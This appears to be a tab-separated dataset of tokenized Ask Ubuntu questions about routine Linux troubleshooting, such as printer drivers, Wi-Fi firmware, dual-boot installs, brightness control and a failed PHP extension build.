227318	installling a brother printer in ubuntu 12.04 ( mfcj6510dw )	i am trying to install a brother mfcj6510dw printer on ubuntu 12.04 . i have tried various ways , but nothing woks for me . i have downloaded the drivers from the solutions brother.com i tried to install from the `` system setting- printing '' on the pull-down menu . there i get the message `` failed to read ppl file - it says something about a missing asterisk in colum1 line 1 in the terminal i get the message can not find file or directory . under localhost:631/printer , i get the message `` no such file or directory '' i tried to install the file i downloaded from the brothers solution center on the ubuntu software centre , there i get the message `` the package is of bad quality '' help i downloaded mfcj6510dwlpr-3.0.0-1.i386.deb and mfcj6510dwcupswrapper-3.0.0-1.i386 i also downloaded linux-bprinter-installer-1.0.0-1.gz , but this does not help either .
227323	how to install ubuntu on my second partition	i am currently using a toshiba portege and have installed window 7 on the first partition ( c : drive ) allocating 200gb for it . on the second partition ( d : drive ) i have allocated 100gb and wish to install ubuntu desktop 12.10 on it . i am a novice and i would really appreciate if someone could help me do this . please reply
227328	html5 websocket-support for nginx	i need websockets in a project for html5 and php , but it donâ´t works . i read something about that nginx is not supporting them . is there a possibility to install a plugin that brings me the support for that ? greetings
227330	how to choose default startup kernel ubuntu 12.04 with a gui program	is there any gui program like the old startup-manager to control the default boot kernel behaviour in ubuntu 12.04 ? thanks .
227338	how to create personalized font in ubuntu ?	is there any other way to create a very own personalized font or character in ubuntu ?
227344	how to recover from bad mythtv frontend settings	i have screwed up my display settings and now when frontend starts the display is huge so that only part of each menu is visible and the screen is not scrollable . is there a file to delete , or perhaps a startup option that would force frontend to start as if no previous customization had occurred ? a fresh start ? thank you in advance for any info or ideas . daniel
227346	permissions , do n't even know how to resolve without reinstalling ubuntu	alright so what i 've done , i installed ubuntu , moved some files while in windows , this caused ubuntu to stop working . i reinstalled it the other day and now that i 've set it all up how i wanted it i 've found that the permissions are on another account which does n't exist ? not sure if this makes sense but when i bring up system monitor or terminal the account name is n't the one i 'm logged into , and there is no way to log into the other account
227348	ssd not found by laptop	i am running ubuntu 12.10 on a new hp envy6 sleekbook , 8gb ram , 500gb hdd , 32gb ssd . but the ssd is not found . first , i wanted to install ubuntu on the ssd but only the sata drive was found . so i went ahead and installed there . now that ubuntu is installed , the ssd is still not found . it is as if it does not exist , but i promise you it is . anyone who can help me with this ?
227349	how to open terminal . gconftool not found	i 'm trying to re-set the defaults for audio playback , and i read in a similar post to enter gconftool -- recursive-unset /apps/gnome-terminal/ into terminal . `` sorry , no results . '' the only results i get in the terminal are for things like audacity . no commands have produced any results . i need to find out how to edit 'profile ' in the terminal , i think ( newbie think ) .
227350	installed ubuntu over windows vista..cant reinstall windows	i recently used the `` compress hard drive '' option within windows . i got the horid `` boot mngr is compressed '' after the restart . i tried booting my system back to windows vista but it doesnt read the cd that came with my computer . i tried going into system recovery and going back to a previous date but it didnt work . i kept pressing f8 but nothing . i installed ubuntu ( the ubuntu cd worked but windows didnt ? ) i installed ubuntu so i could atleast get in my computer , and i still wasnt able to install windows from there . my hard drive got reformatted to a ext4 ? and windows cant install because it doesnt read it ? im not sure , but its very frustrating . my computer is a gateway gt5668e windows vista home premium with sp1 . im a graphic designer and use programs such as photoshop and cinema 4d to do my projects..i have been at a unfortunate halt with my work and i am really bummed out and dont know what to do ... any help ?
227351	virtualbox : start firefox in ubuntu via a windows script ?	i am using virtualbox to run ubuntu 12.04 as a guest in a windows 7 host . i would like execute a command in windows that will launch ubuntu 's firefox . i tried virtualbox 's vboxmanage guestcontrol function . the command seems to do something , but nothing seems to happen in ubuntu : c : \virtualbox > vboxmanage.exe guestcontrol myvirtualmachineubuntu exec -- image `` /usr/bin/firefox '' -- username bob -- password password -- wait-stdout -- verbose waiting for guest to start process ... waiting for process to exit ... exit code=1 ( status=500 [ successfully terminated ] ) the /usr/bin/firefox command works when i run it in ubuntu . also , with guestcontrol , i can successfully call /bin/ls . but i ca n't actually get a major program like firefox to run . any ideas ? thanks .
227352	upgrading beta to full version work without bugs ?	when the beta version of 13.4 comes out , i would like to install it and therefore put all my programs , files , and data on it . on the 18th when the original version of 13.4 comes out , will i be able to upgrade the beta into the original without any issues and successfully run it without bugs . i 'm asking this because when i upgraded 12.4 to 12.10 it had a lot of glitches to it . will the 13.4 run the same after upgrading as if i was to install the it directly as it is ?
227357	roboform lite new login button on toolbar	i installed ubuntu 12.10 on my laptop . after installation , i installed roboform lite 3.1 . everything worked ok . i then installed the file updates ( 160+ files ) . after the update a new login button appeared on the roboform toolbar . i am now unable to use roboform . the new button has a double c green icon to the left . roboform says it is not their button . firefox upgraded to 17 with this update . do you have any idea where this button came from ? thanks !
227358	where to download a fixed dsdt ?	i have an older pc i 'm trying to throw ubuntu on . it 's running an abit nf m2 nview and the dsdt is buggy even on the latest bios . everywhere i look at says to download fixed dsdt 's from this site : http : //acpi.sourceforge.net/dsdt/view.php but it does n't appear to work any longer . this was a fairly popular mobo so i 'm hoping fixed dsdt 's existed . right now the system crashes shortly after booting if i do n't use acpi=off in the boot options .
227367	can not upgrade from maverick	when i attempt to upgrade the update manager shows a warning message stating `` your ubuntu release is no longer supported . '' okay ... click `` close '' it never goes away . locks-up the update manager and game over . next , try to update the software sources but ca n't do that either since it launches from the system > administer > software sources and guess what ? needs sudo ... but like all good linux software i 'm sure the program is buried in a folder somewhere waiting for me to find it through the all powerful terminal program . already commented out all maverick sources by hand but that did n't do the trick . now what ?
227369	how can i set my linux box as a router to forward ip packets ?	i am doing a network experiment about ip packet forwarding , but i do n't know why it does work . i have a linux machine with two network interfaces , eth0 and eth1 both with static ip address ( eth0 : 192.168.100.1 , eth1 : 192.168.101.2 ) . my goal is simple , i just want to forward ip packets from eth1 with destination in subnet 192.168.100.0/24 to eth0 , and forward ip packets from eth0 with destination in subnet 192.168.101.0/24 to eth1 . i turned on ip forwarding with : sysctl -w net.ipv4.ip_forward=1 my routing table is like this : # route -n kernel ip routing table destination gateway genmask flags metric ref use iface 192.168.100.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.101.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 but , when i try to ping from 192.168.100.25 to 192.168.101.47 , it does not work .
227373	how do i turn off tap-to-click for logitech k400r wireless keyboard with touchpad ?	i 'm running kubuntu 12.04 i386 on lenovo thinkcenter . there are no options for the touchpad under `` input devices '' . is there anyway to turn off tap-to-click by editing some text file ?
227375	laptop overheats and turns off even though the fan runs	i installed ubuntu 12.10 on my dell studio 1747 . the laptop fan is up and running as soon as the ubuntu log on screen appears ( even when the laptop is cold ) . the laptop ends up overheating and turning off . do i need to install the correct drivers for my laptop ? i do n't know how to or where to begin . any help would be appreciated . thanks .
227379	gwibber window is blank	i 'm now using gwibber as my social empathy is work correctly with my facebook google account i want to use gwibber to send/receive my email but when i open appear but inside show nothing , only blank , click the icon but nothing shown sorry i ca n't use the image yet ( low reputation ... ... . ) my problem i want to use gwibber as my mail system facebook and google chat can work correctly in empathy
227380	why wo n't xattr pecl extension build on 12.10 ?	i was using the xattr pecl extension in 12.04 ( in fact , i think since 10.04 ) without problem . not surprisingly , i had to reinstall it after upgrading to 12.10 because of the new version of php . but now it fails to build , and i ca n't figure out why . other pecl extensions have built fine . and i have libattr1 and libattr1-dev installed . here 's the output from the build : downloading xattr-1.1.0.tgz ... starting to download xattr-1.1.0.tgz ( 5,204 bytes ) ... ..done : 5,204 bytes 3 source files , building running : phpize configuring for : php api version : 20100412 zend module api no : 20100525 zend extension api no : 220100525 libattr library installation dir ? [ autodetect ] : building in /tmp/pear/temp/pear-build-rootdsmx0g/xattr-1.1.0 running : /tmp/pear/temp/xattr/configure -- with-xattr checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for a sed that does not truncate output ... /bin/sed checking for cc ... cc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether cc accepts -g ... yes checking for cc option to accept iso c89 ... none needed checking how to run the c preprocessor ... cc -e checking for icc ... no checking for suncc ... no checking whether cc understands -c and -o together ... yes checking for system library directory ... lib checking if compiler supports -r ... no checking if compiler supports -wl , -rpath , ... yes checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking target system type ... x86_64-unknown-linux-gnu checking for php prefix ... /usr checking for php includes ... -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib checking for php extension directory ... /usr/lib/php5/20100525 checking for php installed headers prefix ... /usr/include/php5 checking if debug is enabled ... no checking if zts is enabled ... no checking for re2c ... re2c checking for re2c version ... 0.13.5 ( ok ) checking for gawk ... gawk checking for xattr support ... yes , shared checking for xattr files in default path ... found in /usr checking for attr_get in -lattr ... yes checking how to print strings ... printf checking for a sed that does not truncate output ... ( cached ) /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by cc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking for gawk ... ( cached ) gawk checking command to parse /usr/bin/nm -b output from cc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if cc supports -fno-rtti -fno-exceptions ... no checking for cc option to produce pic ... -fpic -dpic checking if cc pic flag -fpic -dpic works ... yes checking if cc static flag -static works ... yes checking if cc supports -c -o file.o ... yes checking if cc supports -c -o file.o ... ( cached ) yes checking whether the cc linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no configure : creating ./config.status config.status : creating config.h config.status : executing libtool commands running : make /bin/bash /tmp/pear/temp/pear-build-rootdsmx0g/xattr-1.1.0/libtool -- mode=compile cc -i . -i/tmp/pear/temp/xattr -dphp_atom_inc -i/tmp/pear/temp/pear-build-rootdsmx0g/xattr-1.1.0/include -i/tmp/pear/temp/pear-build-rootdsmx0g/xattr-1.1.0/main -i/tmp/pear/temp/xattr -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -dhave_config_h -g -o2 -c /tmp/pear/temp/xattr/xattr.c -o xattr.lo libtool : compile : cc -i . -i/tmp/pear/temp/xattr -dphp_atom_inc -i/tmp/pear/temp/pear-build-rootdsmx0g/xattr-1.1.0/include -i/tmp/pear/temp/pear-build-rootdsmx0g/xattr-1.1.0/main -i/tmp/pear/temp/xattr -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib -dhave_config_h -g -o2 -c /tmp/pear/temp/xattr/xattr.c -fpic -dpic -o .libs/xattr.o /tmp/pear/temp/xattr/xattr.c:50:1 : error : unknown type name 'function_entry' /tmp/pear/temp/xattr/xattr.c:51:2 : warning : braces around scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : ( near initialization for 'xattr_functions [ 0 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : initialization makes integer from pointer without a cast [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : ( near initialization for 'xattr_functions [ 0 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : error : initializer element is not computable at load time /tmp/pear/temp/xattr/xattr.c:51:2 : error : ( near initialization for 'xattr_functions [ 0 ] ' ) /tmp/pear/temp/xattr/xattr.c:51:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : ( near initialization for 'xattr_functions [ 0 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : ( near initialization for 'xattr_functions [ 0 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : ( near initialization for 'xattr_functions [ 0 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:51:2 : warning : ( near initialization for 'xattr_functions [ 0 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : braces around scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : ( near initialization for 'xattr_functions [ 1 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : initialization makes integer from pointer without a cast [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : ( near initialization for 'xattr_functions [ 1 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : error : initializer element is not computable at load time /tmp/pear/temp/xattr/xattr.c:52:2 : error : ( near initialization for 'xattr_functions [ 1 ] ' ) /tmp/pear/temp/xattr/xattr.c:52:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : ( near initialization for 'xattr_functions [ 1 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : ( near initialization for 'xattr_functions [ 1 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : ( near initialization for 'xattr_functions [ 1 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:52:2 : warning : ( near initialization for 'xattr_functions [ 1 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : braces around scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : ( near initialization for 'xattr_functions [ 2 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : initialization makes integer from pointer without a cast [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : ( near initialization for 'xattr_functions [ 2 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : error : initializer element is not computable at load time /tmp/pear/temp/xattr/xattr.c:53:2 : error : ( near initialization for 'xattr_functions [ 2 ] ' ) /tmp/pear/temp/xattr/xattr.c:53:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : ( near initialization for 'xattr_functions [ 2 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : ( near initialization for 'xattr_functions [ 2 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : ( near initialization for 'xattr_functions [ 2 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:53:2 : warning : ( near initialization for 'xattr_functions [ 2 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : braces around scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : ( near initialization for 'xattr_functions [ 3 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : initialization makes integer from pointer without a cast [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : ( near initialization for 'xattr_functions [ 3 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : error : initializer element is not computable at load time /tmp/pear/temp/xattr/xattr.c:54:2 : error : ( near initialization for 'xattr_functions [ 3 ] ' ) /tmp/pear/temp/xattr/xattr.c:54:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : ( near initialization for 'xattr_functions [ 3 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : ( near initialization for 'xattr_functions [ 3 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : ( near initialization for 'xattr_functions [ 3 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:54:2 : warning : ( near initialization for 'xattr_functions [ 3 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : braces around scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : ( near initialization for 'xattr_functions [ 4 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : initialization makes integer from pointer without a cast [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : ( near initialization for 'xattr_functions [ 4 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : error : initializer element is not computable at load time /tmp/pear/temp/xattr/xattr.c:55:2 : error : ( near initialization for 'xattr_functions [ 4 ] ' ) /tmp/pear/temp/xattr/xattr.c:55:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : ( near initialization for 'xattr_functions [ 4 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : ( near initialization for 'xattr_functions [ 4 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : ( near initialization for 'xattr_functions [ 4 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:55:2 : warning : ( near initialization for 'xattr_functions [ 4 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:56:2 : warning : braces around scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:56:2 : warning : ( near initialization for 'xattr_functions [ 5 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:56:2 : warning : initialization makes integer from pointer without a cast [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:56:2 : warning : ( near initialization for 'xattr_functions [ 5 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:56:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:56:2 : warning : ( near initialization for 'xattr_functions [ 5 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:56:2 : warning : excess elements in scalar initializer [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:56:2 : warning : ( near initialization for 'xattr_functions [ 5 ] ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:67:2 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/pear/temp/xattr/xattr.c:67:2 : warning : ( near initialization for 'xattr_module_entry.functions ' ) [ enabled by default ] /tmp/pear/temp/xattr/xattr.c : in function 'zif_xattr_set ' : /tmp/pear/temp/xattr/xattr.c:122:49 : error : 'struct _php_core_globals ' has no member named 'safe_mode' /tmp/pear/temp/xattr/xattr.c:122:92 : error : 'checkuid_disallow_file_not_exists ' undeclared ( first use in this function ) /tmp/pear/temp/xattr/xattr.c:122:92 : note : each undeclared identifier is reported only once for each function it appears in /tmp/pear/temp/xattr/xattr.c : in function 'zif_xattr_get ' : /tmp/pear/temp/xattr/xattr.c:171:49 : error : 'struct _php_core_globals ' has no member named 'safe_mode' /tmp/pear/temp/xattr/xattr.c:171:92 : error : 'checkuid_disallow_file_not_exists ' undeclared ( first use in this function ) /tmp/pear/temp/xattr/xattr.c:187:2 : warning : passing argument 4 of 'attr_get ' from incompatible pointer type [ enabled by default ] in file included from /tmp/pear/temp/xattr/xattr.c:37:0 : /usr/include/attr/attributes.h:122:12 : note : expected 'int * ' but argument is of type 'size_t *' /tmp/pear/temp/xattr/xattr.c:198:3 : warning : passing argument 4 of 'attr_get ' from incompatible pointer type [ enabled by default ] in file included from /tmp/pear/temp/xattr/xattr.c:37:0 : /usr/include/attr/attributes.h:122:12 : note : expected 'int * ' but argument is of type 'size_t *' /tmp/pear/temp/xattr/xattr.c : in function 'zif_xattr_supported ' : /tmp/pear/temp/xattr/xattr.c:243:49 : error : 'struct _php_core_globals ' has no member named 'safe_mode' /tmp/pear/temp/xattr/xattr.c:243:92 : error : 'checkuid_disallow_file_not_exists ' undeclared ( first use in this function ) /tmp/pear/temp/xattr/xattr.c : in function 'zif_xattr_remove ' : /tmp/pear/temp/xattr/xattr.c:288:49 : error : 'struct _php_core_globals ' has no member named 'safe_mode' /tmp/pear/temp/xattr/xattr.c:288:92 : error : 'checkuid_disallow_file_not_exists ' undeclared ( first use in this function ) /tmp/pear/temp/xattr/xattr.c : in function 'zif_xattr_list ' : /tmp/pear/temp/xattr/xattr.c:337:49 : error : 'struct _php_core_globals ' has no member named 'safe_mode' /tmp/pear/temp/xattr/xattr.c:337:92 : error : 'checkuid_disallow_file_not_exists ' undeclared ( first use in this function ) make : *** [ xattr.lo ] error 1 error : `make ' failed there seem to be a few errors , but i ca n't make heads or tails of them . does this just not work properly in 12.10 ? that would be a big problem for me . p.s . for anyone interested , i created a workaround that looks like this : if ( ! function_exists ( 'xattr_get ' ) ) { $ attr = exec ( `` which attr '' ) ; $ xattr = exec ( `` which xattr '' ) ; if ( ! empty ( $ attr ) ) { trigger_error ( `` xattr extension not found . using command-line attr . performance will be affected '' ) ; function xattr_get ( $ path , $ name , $ flags = 0 ) { return exec ( `` attr -qg `` . escapeshellarg ( $ name ) . `` `` . escapeshellarg ( $ path ) . `` 2 > /dev/null '' ) ; } function xattr_set ( $ path , $ name , $ value , $ flags = 0 ) { exec ( `` attr -qs `` . escapeshellarg ( $ name ) . `` -v `` . escapeshellarg ( $ value ) . `` `` . escapeshellarg ( $ path ) , $ out , $ r ) ; return $ r == 0 ; } } elseif ( ! empty ( $ xattr ) ) { trigger_error ( `` xattr extension not found . using command-line xattr . performance will be greatly affected '' ) ; function xattr_get ( $ path , $ name , $ flags = 0 ) { return trim ( exec ( `` xattr -p user . '' . escapeshellarg ( $ name ) . `` `` . escapeshellarg ( $ path ) . `` 2 > /dev/null '' ) ) ; } function xattr_set ( $ path , $ name , $ value , $ flags = 0 ) { exec ( `` xattr -w user . '' . escapeshellarg ( $ name ) . `` `` . escapeshellarg ( $ value ) . `` `` . escapeshellarg ( $ path ) , $ out , $ r ) ; return $ r == 0 ; } } else { trigger_error ( `` xattr extension not found . no command-line substitute found . xattr not supported '' , e_user_warning ) ; function xattr_get ( $ path , $ name , $ flags = 0 ) { return false ; } function xattr_set ( $ path , $ name , $ value , $ flags = 0 ) { return false ; } } } i only use the _get and _set methods , but the others could be added in a similar fashion .
227385	xubuntu lightdm shows blank screen half the time	system info : ( will be amended if any more info is asked for ) my laptop runs xubuntu 12.10 . as it has a solid state drive , /tmp , /var/tmp , /var/log and /var/log/apt are set to tmpfs in the /etc/fstab file - in case this makes any difference . problem my problem is quite simple . approximately 50 % of boot attempts end in the mouse cursor on a black screen ( presumably lightdm failing to load ) , forcing me to restart and try again . i can access the ctrl+alt+f1 terminal to reboot the machine , but it 's very annoying having to shut down and reboot one , two or three times before successfully reaching the login screen . the error seems to be with lightdm , as i 've tried five boots in a row with gdm and they 've all gone fine . thanks for any help you can give . xorg.1.log after running xstart after failed boot : http : //paste.ubuntu.com/1437249/
227386	force nautilus to open with extra pane	i 've found having the extra pane in nautilus ( by clicking f3 ) to be insanely useful , and i 'd like the extra pane to be open by default any time i open a nautilus window . is this possible ?
227387	using apt-get partially through a proxy server	my university campus has ubuntu repos on the local server . also , we use a proxy server to connect to the internet . now , my repository is the campus local server , but i do have a lot ppas installed in my system . when i do apt-get update through the proxy server , even the connections to the local server go via the proxy server , making the whole process very slow . if i do n't use the proxy server , then the ppas do n't get updated . how can i do apt-get update , such that only ppas use the proxy server , and the other repos get updated directly from the local server without going through the proxy server .
227391	can not change screen brightness	i ca n't change the screen brightness on my laptop ( asus g53jw ) with 12.10 installed . i have tried many ways to solve the problem , but nothing worked . i tried to edit grub with acpi_vendor and acpi_osi ( i have tried all the combinations found on the ubuntu.org forum but still i ca n't change it . i even tried to add in xorg.conf the string : option “registrydwords” “enablebrightnesscontrol=1″ nothing changed . the only way to get it to work is to use nvidiabl but i have flickering problems with it and i 'd like to find a way to solve the problem without external modules like nvidiabl .
227392	firmware missing and wi-fi not working	i put ubuntu on an acer aspire 3690 laptop ( replaced windows vista ) . everything seems to work fine except the wireless connection . it says firmware missing . it detects that i have a wireless card , so i do n't know what to do . i 've already used the additional drivers thing , and that did n't work . i 've googled and have not found anything helpful . i do n't really know what i 'm doing , so can your directions please be kindergarten level ? thank you very much for any help you can provide . i really appreciate it .
227393	how to get data from a bluetooth device that is not visible ?	i just bought a fitbit one which includes bluetooth 4.0 to sync with mobile devices . currently libfitbit does not include support for bluetooth syncing , so i would like to see how much data i can get out of the device that i can pass onto the libfitbit devs so that they can explore bluetooth support . i ran : hcitool scan which unfortunately did not return any devices . i also used blueman to scan for devices and nothing was found either . therefore i am assuming that the bluetooth radio in the device is not visible by default . can anyone recommend any ways to get data out of the device that could be helpful ?
227394	lost wi-fi after ubuntu 12.10 ( precise pangolin ) upgrade	i received my new dell vostro 2420 last week and just got around to upgrading from ubuntu 11.10 ( oneiric ocelot ) to ubuntu 12.10 ( quantal quetzal ) . unfortunately , like many others ( after researching the issue ) , i no longer have wi-fi . i have tried every sudo command given that worked for others and still ca n't get my wireless to function . i can connect via ethernet , just not via wi-fi . as a matter of fact , when i use fn + f2 to turn on wi-fi , only my bluetooth comes on . lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation panther point pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 07:00.0 network controller : broadcom corporation device 4365 ( rev 01 ) 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) this is what i am getting ... dpkg : error : -- install needs at least one package archive file argument type dpkg -- help for help about installing and deinstalling packages [ * ] ; use dselect or aptitude for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through less or more !
227396	lubuntu font too small to read	my lubuntu font size suddenly turned extremely tiny ( upper case characters are 4 pixels high ) for some reason . the only possible change i can think of is i turned on desktop sharing ( vino ) in the session settings . the system fonts is ubuntu 11 . how can i fix it ? changing system font size actually does n't do anything at all . texts are still 4 pixels high .
227397	python terminal not working for for loops	i ran this code in the python terminal : > > > for news in news_list : ... print news ( `` li '' , { `` class '' , `` first '' } ) [ 0 ] .a [ `` href '' ] ... ... i want to be able to close this for loop in the terminal , but i have no idea how to . i tried pressing enter twice but it does n't work .
227404	how to delete an attachment in an email in evolution ?	i would like to delete attachments from the email in the email client evolution ( at the moment 3.2.3 , ubuntu 12.04 ) , so my the size of the imap-folders will not be bloated and can be reduced .
